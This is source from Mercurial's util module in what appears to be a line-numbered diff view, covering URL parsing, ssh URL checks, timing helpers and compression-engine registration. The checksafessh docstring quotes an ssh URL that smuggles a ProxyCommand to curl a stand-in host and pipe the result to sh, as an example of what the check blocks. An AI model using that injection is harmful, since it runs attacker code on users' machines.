2551 2563 # process fails to start, it will be left in a zombie state until
2552 2564 the parent waits on it, which we cannot do since we expect a long
2553 2565 # running process on success. Instead we listen for SIGCHLD telling
2554 2566 # us our child process terminated.
2555 2567 terminated = set()
2556 2568 def handler(signum, frame):
2557 2569 terminated.add(os.wait())
2558 2570 prevhandler = None
2559 2571 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2560 2572 if SIGCHLD is not None:
2561 2573 prevhandler = signal.signal(SIGCHLD, handler)
2562 2574 try:
2563 2575 pid = spawndetached(args)
2564 2576 while not condfn():
2565 2577 if ((pid in terminated or not testpid(pid))
2566 2578 and not condfn()):
2567 2579 return -1
2568 2580 time.sleep(0.1)
2569 2581 return pid
2570 2582 finally:
2571 2583 if prevhandler is not None:
2572 2584 signal.signal(signal.SIGCHLD, prevhandler)
2573 2585
2574 2586 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2575 2587 """Return the result of interpolating items in the mapping into string s.
2576 2588
2577 2589 prefix is a single character string, or a two character string with
2578 2590 a backslash as the first character if the prefix needs to be escaped in
2579 2591 a regular expression.
2580 2592
2581 2593 fn is an optional function that will be applied to the replacement text
2582 2594 just before replacement.
2583 2595
2584 2596 escape_prefix is an optional flag that allows using doubled prefix for
2585 2597 its escaping.
2586 2598 """
2587 2599 fn = fn or (lambda s: s)
2588 2600 patterns = '|'.join(mapping.keys())
2589 2601 if escape_prefix:
2590 2602 patterns += '|' + prefix
2591 2603 if len(prefix) > 1:
2592 2604 prefix_char = prefix[1:]
2593 2605 else:
2594 2606 prefix_char = prefix
2595 2607 mapping[prefix_char] = prefix_char
2596 2608 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2597 2609 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2598 2610
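# Illustrative sketch (hypothetical mapping): '$' is a regex metacharacter,
# so it must be passed pre-escaped as described in the docstring above.
#
#   >>> interpolate(br'\$', {b'user': b'joe'}, b'hello $user')
#   'hello joe'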
2599 2611 def getport(port):
2600 2612 """Return the port for a given network service.
2601 2613
2602 2614 If port is an integer, it's returned as is. If it's a string, it's
2603 2615 looked up using socket.getservbyname(). If there's no matching
2604 2616 service, error.Abort is raised.
2605 2617 """
2606 2618 try:
2607 2619 return int(port)
2608 2620 except ValueError:
2609 2621 pass
2610 2622
2611 2623 try:
2612 2624 return socket.getservbyname(port)
2613 2625 except socket.error:
2614 2626 raise Abort(_("no port number associated with service '%s'") % port)
2615 2627
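# Illustrative behaviour (service lookup relies on the local services
# database, so 'http' resolves to 80 on typical systems):
#
#   getport(8080)    -> 8080
#   getport('8080')  -> 8080
#   getport('http')  -> 80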
2616 2628 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2617 2629 '0': False, 'no': False, 'false': False, 'off': False,
2618 2630 'never': False}
2619 2631
2620 2632 def parsebool(s):
2621 2633 """Parse s into a boolean.
2622 2634
2623 2635 If s is not a valid boolean, returns None.
2624 2636 """
2625 2637 return _booleans.get(s.lower(), None)
2626 2638
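# Illustrative values (lookup is case-insensitive; unknown strings map
# to None rather than raising):
#
#   >>> parsebool('on'), parsebool('Never'), parsebool('maybe')
#   (True, False, None)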
2627 2639 _hextochr = dict((a + b, chr(int(a + b, 16)))
2628 2640 for a in string.hexdigits for b in string.hexdigits)
2629 2641
2630 2642 class url(object):
2631 2643 r"""Reliable URL parser.
2632 2644
2633 2645 This parses URLs and provides attributes for the following
2634 2646 components:
2635 2647
2636 2648 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2637 2649
2638 2650 Missing components are set to None. The only exception is
2639 2651 fragment, which is set to '' if present but empty.
2640 2652
2641 2653 If parsefragment is False, fragment is included in query. If
2642 2654 parsequery is False, query is included in path. If both are
2643 2655 False, both fragment and query are included in path.
2644 2656
2645 2657 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2646 2658
2647 2659 Note that for backward compatibility reasons, bundle URLs do not
2648 2660 take host names. That means 'bundle://../' has a path of '../'.
2649 2661
2650 2662 Examples:
2651 2663
2652 2664 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2653 2665 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2654 2666 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2655 2667 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2656 2668 >>> url(b'file:///home/joe/repo')
2657 2669 <url scheme: 'file', path: '/home/joe/repo'>
2658 2670 >>> url(b'file:///c:/temp/foo/')
2659 2671 <url scheme: 'file', path: 'c:/temp/foo/'>
2660 2672 >>> url(b'bundle:foo')
2661 2673 <url scheme: 'bundle', path: 'foo'>
2662 2674 >>> url(b'bundle://../foo')
2663 2675 <url scheme: 'bundle', path: '../foo'>
2664 2676 >>> url(br'c:\foo\bar')
2665 2677 <url path: 'c:\\foo\\bar'>
2666 2678 >>> url(br'\\blah\blah\blah')
2667 2679 <url path: '\\\\blah\\blah\\blah'>
2668 2680 >>> url(br'\\blah\blah\blah#baz')
2669 2681 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2670 2682 >>> url(br'file:///C:\users\me')
2671 2683 <url scheme: 'file', path: 'C:\\users\\me'>
2672 2684
2673 2685 Authentication credentials:
2674 2686
2675 2687 >>> url(b'ssh://joe:xyz@x/repo')
2676 2688 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2677 2689 >>> url(b'ssh://joe@x/repo')
2678 2690 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2679 2691
2680 2692 Query strings and fragments:
2681 2693
2682 2694 >>> url(b'http://host/a?b#c')
2683 2695 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2684 2696 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2685 2697 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2686 2698
2687 2699 Empty path:
2688 2700
2689 2701 >>> url(b'')
2690 2702 <url path: ''>
2691 2703 >>> url(b'#a')
2692 2704 <url path: '', fragment: 'a'>
2693 2705 >>> url(b'http://host/')
2694 2706 <url scheme: 'http', host: 'host', path: ''>
2695 2707 >>> url(b'http://host/#a')
2696 2708 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2697 2709
2698 2710 Only scheme:
2699 2711
2700 2712 >>> url(b'http:')
2701 2713 <url scheme: 'http'>
2702 2714 """
2703 2715
2704 2716 _safechars = "!~*'()+"
2705 2717 _safepchars = "/!~*'()+:\\"
2706 2718 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2707 2719
2708 2720 def __init__(self, path, parsequery=True, parsefragment=True):
2709 2721 # We slowly chomp away at path until we have only the path left
2710 2722 self.scheme = self.user = self.passwd = self.host = None
2711 2723 self.port = self.path = self.query = self.fragment = None
2712 2724 self._localpath = True
2713 2725 self._hostport = ''
2714 2726 self._origpath = path
2715 2727
2716 2728 if parsefragment and '#' in path:
2717 2729 path, self.fragment = path.split('#', 1)
2718 2730
2719 2731 # special case for Windows drive letters and UNC paths
2720 2732 if hasdriveletter(path) or path.startswith('\\\\'):
2721 2733 self.path = path
2722 2734 return
2723 2735
2724 2736 # For compatibility reasons, we can't handle bundle paths as
2725 2737 # normal URLs
2726 2738 if path.startswith('bundle:'):
2727 2739 self.scheme = 'bundle'
2728 2740 path = path[7:]
2729 2741 if path.startswith('//'):
2730 2742 path = path[2:]
2731 2743 self.path = path
2732 2744 return
2733 2745
2734 2746 if self._matchscheme(path):
2735 2747 parts = path.split(':', 1)
2736 2748 if parts[0]:
2737 2749 self.scheme, path = parts
2738 2750 self._localpath = False
2739 2751
2740 2752 if not path:
2741 2753 path = None
2742 2754 if self._localpath:
2743 2755 self.path = ''
2744 2756 return
2745 2757 else:
2746 2758 if self._localpath:
2747 2759 self.path = path
2748 2760 return
2749 2761
2750 2762 if parsequery and '?' in path:
2751 2763 path, self.query = path.split('?', 1)
2752 2764 if not path:
2753 2765 path = None
2754 2766 if not self.query:
2755 2767 self.query = None
2756 2768
2757 2769 # // is required to specify a host/authority
2758 2770 if path and path.startswith('//'):
2759 2771 parts = path[2:].split('/', 1)
2760 2772 if len(parts) > 1:
2761 2773 self.host, path = parts
2762 2774 else:
2763 2775 self.host = parts[0]
2764 2776 path = None
2765 2777 if not self.host:
2766 2778 self.host = None
2767 2779 # path of file:///d is /d
2768 2780 # path of file:///d:/ is d:/, not /d:/
2769 2781 if path and not hasdriveletter(path):
2770 2782 path = '/' + path
2771 2783
2772 2784 if self.host and '@' in self.host:
2773 2785 self.user, self.host = self.host.rsplit('@', 1)
2774 2786 if ':' in self.user:
2775 2787 self.user, self.passwd = self.user.split(':', 1)
2776 2788 if not self.host:
2777 2789 self.host = None
2778 2790
2779 2791 # Don't split on colons in IPv6 addresses without ports
2780 2792 if (self.host and ':' in self.host and
2781 2793 not (self.host.startswith('[') and self.host.endswith(']'))):
2782 2794 self._hostport = self.host
2783 2795 self.host, self.port = self.host.rsplit(':', 1)
2784 2796 if not self.host:
2785 2797 self.host = None
2786 2798
2787 2799 if (self.host and self.scheme == 'file' and
2788 2800 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2789 2801 raise Abort(_('file:// URLs can only refer to localhost'))
2790 2802
2791 2803 self.path = path
2792 2804
2793 2805 # leave the query string escaped
2794 2806 for a in ('user', 'passwd', 'host', 'port',
2795 2807 'path', 'fragment'):
2796 2808 v = getattr(self, a)
2797 2809 if v is not None:
2798 2810 setattr(self, a, urlreq.unquote(v))
2799 2811
2800 2812 @encoding.strmethod
2801 2813 def __repr__(self):
2802 2814 attrs = []
2803 2815 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2804 2816 'query', 'fragment'):
2805 2817 v = getattr(self, a)
2806 2818 if v is not None:
2807 2819 attrs.append('%s: %r' % (a, v))
2808 2820 return '<url %s>' % ', '.join(attrs)
2809 2821
2810 2822 def __bytes__(self):
2811 2823 r"""Join the URL's components back into a URL string.
2812 2824
2813 2825 Examples:
2814 2826
2815 2827 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2816 2828 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2817 2829 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2818 2830 'http://user:pw@host:80/?foo=bar&baz=42'
2819 2831 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2820 2832 'http://user:pw@host:80/?foo=bar%3dbaz'
2821 2833 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2822 2834 'ssh://user:pw@[::1]:2200//home/joe#'
2823 2835 >>> bytes(url(b'http://localhost:80//'))
2824 2836 'http://localhost:80//'
2825 2837 >>> bytes(url(b'http://localhost:80/'))
2826 2838 'http://localhost:80/'
2827 2839 >>> bytes(url(b'http://localhost:80'))
2828 2840 'http://localhost:80/'
2829 2841 >>> bytes(url(b'bundle:foo'))
2830 2842 'bundle:foo'
2831 2843 >>> bytes(url(b'bundle://../foo'))
2832 2844 'bundle:../foo'
2833 2845 >>> bytes(url(b'path'))
2834 2846 'path'
2835 2847 >>> bytes(url(b'file:///tmp/foo/bar'))
2836 2848 'file:///tmp/foo/bar'
2837 2849 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2838 2850 'file:///c:/tmp/foo/bar'
2839 2851 >>> print(url(br'bundle:foo\bar'))
2840 2852 bundle:foo\bar
2841 2853 >>> print(url(br'file:///D:\data\hg'))
2842 2854 file:///D:\data\hg
2843 2855 """
2844 2856 if self._localpath:
2845 2857 s = self.path
2846 2858 if self.scheme == 'bundle':
2847 2859 s = 'bundle:' + s
2848 2860 if self.fragment:
2849 2861 s += '#' + self.fragment
2850 2862 return s
2851 2863
2852 2864 s = self.scheme + ':'
2853 2865 if self.user or self.passwd or self.host:
2854 2866 s += '//'
2855 2867 elif self.scheme and (not self.path or self.path.startswith('/')
2856 2868 or hasdriveletter(self.path)):
2857 2869 s += '//'
2858 2870 if hasdriveletter(self.path):
2859 2871 s += '/'
2860 2872 if self.user:
2861 2873 s += urlreq.quote(self.user, safe=self._safechars)
2862 2874 if self.passwd:
2863 2875 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2864 2876 if self.user or self.passwd:
2865 2877 s += '@'
2866 2878 if self.host:
2867 2879 if not (self.host.startswith('[') and self.host.endswith(']')):
2868 2880 s += urlreq.quote(self.host)
2869 2881 else:
2870 2882 s += self.host
2871 2883 if self.port:
2872 2884 s += ':' + urlreq.quote(self.port)
2873 2885 if self.host:
2874 2886 s += '/'
2875 2887 if self.path:
2876 2888 # TODO: similar to the query string, we should not unescape the
2877 2889 # path when we store it, the path might contain '%2f' = '/',
2878 2890 # which we should *not* escape.
2879 2891 s += urlreq.quote(self.path, safe=self._safepchars)
2880 2892 if self.query:
2881 2893 # we store the query in escaped form.
2882 2894 s += '?' + self.query
2883 2895 if self.fragment is not None:
2884 2896 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2885 2897 return s
2886 2898
2887 2899 __str__ = encoding.strmethod(__bytes__)
2888 2900
2889 2901 def authinfo(self):
2890 2902 user, passwd = self.user, self.passwd
2891 2903 try:
2892 2904 self.user, self.passwd = None, None
2893 2905 s = bytes(self)
2894 2906 finally:
2895 2907 self.user, self.passwd = user, passwd
2896 2908 if not self.user:
2897 2909 return (s, None)
2898 2910 # authinfo[1] is passed to urllib2 password manager, and its
2899 2911 # URIs must not contain credentials. The host is passed in the
2900 2912 # URIs list because Python < 2.4.3 uses only that to search for
2901 2913 # a password.
2902 2914 return (s, (None, (s, self.host),
2903 2915 self.user, self.passwd or ''))
2904 2916
2905 2917 def isabs(self):
2906 2918 if self.scheme and self.scheme != 'file':
2907 2919 return True # remote URL
2908 2920 if hasdriveletter(self.path):
2909 2921 return True # absolute for our purposes - can't be joined()
2910 2922 if self.path.startswith(br'\\'):
2911 2923 return True # Windows UNC path
2912 2924 if self.path.startswith('/'):
2913 2925 return True # POSIX-style
2914 2926 return False
2915 2927
2916 2928 def localpath(self):
2917 2929 if self.scheme == 'file' or self.scheme == 'bundle':
2918 2930 path = self.path or '/'
2919 2931 # For Windows, we need to promote hosts containing drive
2920 2932 # letters to paths with drive letters.
2921 2933 if hasdriveletter(self._hostport):
2922 2934 path = self._hostport + '/' + self.path
2923 2935 elif (self.host is not None and self.path
2924 2936 and not hasdriveletter(path)):
2925 2937 path = '/' + path
2926 2938 return path
2927 2939 return self._origpath
2928 2940
2929 2941 def islocal(self):
2930 2942 '''whether localpath will return something that posixfile can open'''
2931 2943 return (not self.scheme or self.scheme == 'file'
2932 2944 or self.scheme == 'bundle')
2933 2945
2934 2946 def hasscheme(path):
2935 2947 return bool(url(path).scheme)
2936 2948
2937 2949 def hasdriveletter(path):
2938 2950 return path and path[1:2] == ':' and path[0:1].isalpha()
2939 2951
2940 2952 def urllocalpath(path):
2941 2953 return url(path, parsequery=False, parsefragment=False).localpath()
2942 2954
2943 2955 def checksafessh(path):
2944 2956 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2945 2957
2946 2958 This is a sanity check for ssh urls. ssh will parse the first item as
2947 2959 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2948 2960 Let's prevent these potentially exploitable urls entirely and warn the
2949 2961 user.
2950 2962
2951 2963 Raises an error.Abort when the url is unsafe.
2952 2964 """
2953 2965 path = urlreq.unquote(path)
2954 2966 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2955 2967 raise error.Abort(_('potentially unsafe url: %r') %
2956 2968 (path,))
2957 2969
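# Illustrative sketch (hypothetical urls): a leading '-' in the host
# position would be parsed by ssh as an option, so it is rejected.
#
#   checksafessh('ssh://example.com/repo')          # returns None
#   checksafessh('ssh://-oProxyCommand=evil/x')     # raises error.Abort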
2958 2970 def hidepassword(u):
2959 2971 '''hide user credential in a url string'''
2960 2972 u = url(u)
2961 2973 if u.passwd:
2962 2974 u.passwd = '***'
2963 2975 return bytes(u)
2964 2976
2965 2977 def removeauth(u):
2966 2978 '''remove all authentication information from a url string'''
2967 2979 u = url(u)
2968 2980 u.user = u.passwd = None
2969 2981 return str(u)
2970 2982
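# Illustrative values for the two helpers above (hypothetical url):
#
#   >>> hidepassword(b'http://joe:secret@example.com/repo')
#   'http://joe:***@example.com/repo'
#   >>> removeauth(b'http://joe:secret@example.com/repo')
#   'http://example.com/repo'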
2971 2983 timecount = unitcountfn(
2972 2984 (1, 1e3, _('%.0f s')),
2973 2985 (100, 1, _('%.1f s')),
2974 2986 (10, 1, _('%.2f s')),
2975 2987 (1, 1, _('%.3f s')),
2976 2988 (100, 0.001, _('%.1f ms')),
2977 2989 (10, 0.001, _('%.2f ms')),
2978 2990 (1, 0.001, _('%.3f ms')),
2979 2991 (100, 0.000001, _('%.1f us')),
2980 2992 (10, 0.000001, _('%.2f us')),
2981 2993 (1, 0.000001, _('%.3f us')),
2982 2994 (100, 0.000000001, _('%.1f ns')),
2983 2995 (10, 0.000000001, _('%.2f ns')),
2984 2996 (1, 0.000000001, _('%.3f ns')),
2985 2997 )
2986 2998
2987 2999 _timenesting = [0]
2988 3000
2989 3001 def timed(func):
2990 3002 '''Report the execution time of a function call to stderr.
2991 3003
2992 3004 During development, use as a decorator when you need to measure
2993 3005 the cost of a function, e.g. as follows:
2994 3006
2995 3007 @util.timed
2996 3008 def foo(a, b, c):
2997 3009 pass
2998 3010 '''
2999 3011
3000 3012 def wrapper(*args, **kwargs):
3001 3013 start = timer()
3002 3014 indent = 2
3003 3015 _timenesting[0] += indent
3004 3016 try:
3005 3017 return func(*args, **kwargs)
3006 3018 finally:
3007 3019 elapsed = timer() - start
3008 3020 _timenesting[0] -= indent
3009 3021 stderr.write('%s%s: %s\n' %
3010 3022 (' ' * _timenesting[0], func.__name__,
3011 3023 timecount(elapsed)))
3012 3024 return wrapper
3013 3025
3014 3026 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3015 3027 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3016 3028
3017 3029 def sizetoint(s):
3018 3030 '''Convert a space specifier to a byte count.
3019 3031
3020 3032 >>> sizetoint(b'30')
3021 3033 30
3022 3034 >>> sizetoint(b'2.2kb')
3023 3035 2252
3024 3036 >>> sizetoint(b'6M')
3025 3037 6291456
3026 3038 '''
3027 3039 t = s.strip().lower()
3028 3040 try:
3029 3041 for k, u in _sizeunits:
3030 3042 if t.endswith(k):
3031 3043 return int(float(t[:-len(k)]) * u)
3032 3044 return int(t)
3033 3045 except ValueError:
3034 3046 raise error.ParseError(_("couldn't parse size: %s") % s)
3035 3047
3036 3048 class hooks(object):
3037 3049 '''A collection of hook functions that can be used to extend a
3038 3050 function's behavior. Hooks are called in lexicographic order,
3039 3051 based on the names of their sources.'''
3040 3052
3041 3053 def __init__(self):
3042 3054 self._hooks = []
3043 3055
3044 3056 def add(self, source, hook):
3045 3057 self._hooks.append((source, hook))
3046 3058
3047 3059 def __call__(self, *args):
3048 3060 self._hooks.sort(key=lambda x: x[0])
3049 3061 results = []
3050 3062 for source, hook in self._hooks:
3051 3063 results.append(hook(*args))
3052 3064 return results
3053 3065
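# Illustrative sketch (hypothetical sources): hooks run sorted by source
# name, and the call returns the individual results in that order.
#
#   >>> h = hooks()
#   >>> h.add('b-src', lambda x: x + 1)
#   >>> h.add('a-src', lambda x: x * 2)
#   >>> h(3)
#   [6, 4]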
3054 3066 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3055 3067 '''Yields lines for a nicely formatted stacktrace.
3056 3068 Skips the 'skip' last entries, then returns the last 'depth' entries.
3057 3069 Each file+linenumber is formatted according to fileline.
3058 3070 Each line is formatted according to line.
3059 3071 If line is None, it yields:
3060 3072 length of longest filepath+line number,
3061 3073 filepath+linenumber,
3062 3074 function
3063 3075
3064 3076 Not to be used in production code, but very convenient while developing.
3065 3077 '''
3066 3078 entries = [(fileline % (fn, ln), func)
3067 3079 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3068 3080 ][-depth:]
3069 3081 if entries:
3070 3082 fnmax = max(len(entry[0]) for entry in entries)
3071 3083 for fnln, func in entries:
3072 3084 if line is None:
3073 3085 yield (fnmax, fnln, func)
3074 3086 else:
3075 3087 yield line % (fnmax, fnln, func)
3076 3088
3077 3089 def debugstacktrace(msg='stacktrace', skip=0,
3078 3090 f=stderr, otherf=stdout, depth=0):
3079 3091 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3080 3092 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3081 3093 By default it will flush stdout first.
3082 3094 It can be used everywhere and intentionally does not require an ui object.
3083 3095 Not be used in production code but very convenient while developing.
3084 3096 '''
3085 3097 if otherf:
3086 3098 otherf.flush()
3087 3099 f.write('%s at:\n' % msg.rstrip())
3088 3100 for line in getstackframes(skip + 1, depth=depth):
3089 3101 f.write(line)
3090 3102 f.flush()
3091 3103
3092 3104 class dirs(object):
3093 3105 '''a multiset of directory names from a dirstate or manifest'''
3094 3106
3095 3107 def __init__(self, map, skip=None):
3096 3108 self._dirs = {}
3097 3109 addpath = self.addpath
3098 3110 if safehasattr(map, 'iteritems') and skip is not None:
3099 3111 for f, s in map.iteritems():
3100 3112 if s[0] != skip:
3101 3113 addpath(f)
3102 3114 else:
3103 3115 for f in map:
3104 3116 addpath(f)
3105 3117
3106 3118 def addpath(self, path):
3107 3119 dirs = self._dirs
3108 3120 for base in finddirs(path):
3109 3121 if base in dirs:
3110 3122 dirs[base] += 1
3111 3123 return
3112 3124 dirs[base] = 1
3113 3125
3114 3126 def delpath(self, path):
3115 3127 dirs = self._dirs
3116 3128 for base in finddirs(path):
3117 3129 if dirs[base] > 1:
3118 3130 dirs[base] -= 1
3119 3131 return
3120 3132 del dirs[base]
3121 3133
3122 3134 def __iter__(self):
3123 3135 return iter(self._dirs)
3124 3136
3125 3137 def __contains__(self, d):
3126 3138 return d in self._dirs
3127 3139
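# Illustrative sketch of the pure-Python dirs class above (the C version
# from parsers, substituted below when available, behaves the same way):
#
#   >>> d = dirs(['a/b/c', 'a/b/d'])
#   >>> sorted(d)
#   ['a', 'a/b']
#   >>> 'a/b' in d
#   True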
3128 3140 if safehasattr(parsers, 'dirs'):
3129 3141 dirs = parsers.dirs
3130 3142
3131 3143 def finddirs(path):
3132 3144 pos = path.rfind('/')
3133 3145 while pos != -1:
3134 3146 yield path[:pos]
3135 3147 pos = path.rfind('/', 0, pos)
3136 3148
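# Illustrative values: finddirs yields ancestor directories from the
# deepest up to (but not including) the root.
#
#   >>> list(finddirs('a/b/c'))
#   ['a/b', 'a']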
3137 3149 # compression code
3138 3150
3139 3151 SERVERROLE = 'server'
3140 3152 CLIENTROLE = 'client'
3141 3153
3142 3154 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3143 3155 (u'name', u'serverpriority',
3144 3156 u'clientpriority'))
3145 3157
3146 3158 class compressormanager(object):
3147 3159 """Holds registrations of various compression engines.
3148 3160
3149 3161 This class essentially abstracts the differences between compression
3150 3162 engines to allow new compression formats to be added easily, possibly from
3151 3163 extensions.
3152 3164
3153 3165 Compressors are registered against the global instance by calling its
3154 3166 ``register()`` method.
3155 3167 """
3156 3168 def __init__(self):
3157 3169 self._engines = {}
3158 3170 # Bundle spec human name to engine name.
3159 3171 self._bundlenames = {}
3160 3172 # Internal bundle identifier to engine name.
3161 3173 self._bundletypes = {}
3162 3174 # Revlog header to engine name.
3163 3175 self._revlogheaders = {}
3164 3176 # Wire proto identifier to engine name.
3165 3177 self._wiretypes = {}
3166 3178
3167 3179 def __getitem__(self, key):
3168 3180 return self._engines[key]
3169 3181
3170 3182 def __contains__(self, key):
3171 3183 return key in self._engines
3172 3184
3173 3185 def __iter__(self):
3174 3186 return iter(self._engines.keys())
3175 3187
3176 3188 def register(self, engine):
3177 3189 """Register a compression engine with the manager.
3178 3190
3179 3191 The argument must be a ``compressionengine`` instance.
3180 3192 """
3181 3193 if not isinstance(engine, compressionengine):
3182 3194 raise ValueError(_('argument must be a compressionengine'))
3183 3195
3184 3196 name = engine.name()
3185 3197
3186 3198 if name in self._engines:
3187 3199 raise error.Abort(_('compression engine %s already registered') %
3188 3200 name)
3189 3201
3190 3202 bundleinfo = engine.bundletype()
3191 3203 if bundleinfo:
3192 3204 bundlename, bundletype = bundleinfo
3193 3205
3194 3206 if bundlename in self._bundlenames:
3195 3207 raise error.Abort(_('bundle name %s already registered') %
3196 3208 bundlename)
3197 3209 if bundletype in self._bundletypes:
3198 3210 raise error.Abort(_('bundle type %s already registered by %s') %
3199 3211 (bundletype, self._bundletypes[bundletype]))
3200 3212
3201 3213 # No external facing name declared.
3202 3214 if bundlename:
3203 3215 self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle name isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))

    def forwiretype(self, wiretype):
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

compengines = compressormanager()
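
# A minimal usage sketch (illustrative, not part of the original module):
# callers typically resolve an engine through the global manager rather than
# instantiating engine classes directly. The helper below is hypothetical and
# only demonstrates the lookup API defined above.
def _examplebundlecompress(chunks):
    # 'gzip' is the user-facing bundle spec name registered by the zlib
    # engine defined later in this module; forbundlename() aborts if the
    # engine exists but cannot be loaded.
    engine = compengines.forbundlename('gzip')
    return ''.join(engine.compressstream(chunks))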

class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of chunks of bytes representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
